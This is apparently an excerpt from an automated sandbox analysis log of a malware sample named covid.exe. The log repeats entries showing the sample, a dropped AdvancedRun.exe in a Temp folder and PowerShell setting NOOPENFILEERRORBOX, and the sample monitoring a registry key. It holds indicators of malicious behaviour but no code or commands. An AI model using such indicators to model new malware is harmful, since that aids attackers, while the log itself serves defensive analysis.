Source: C:\Users\user\Desktop\covid.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
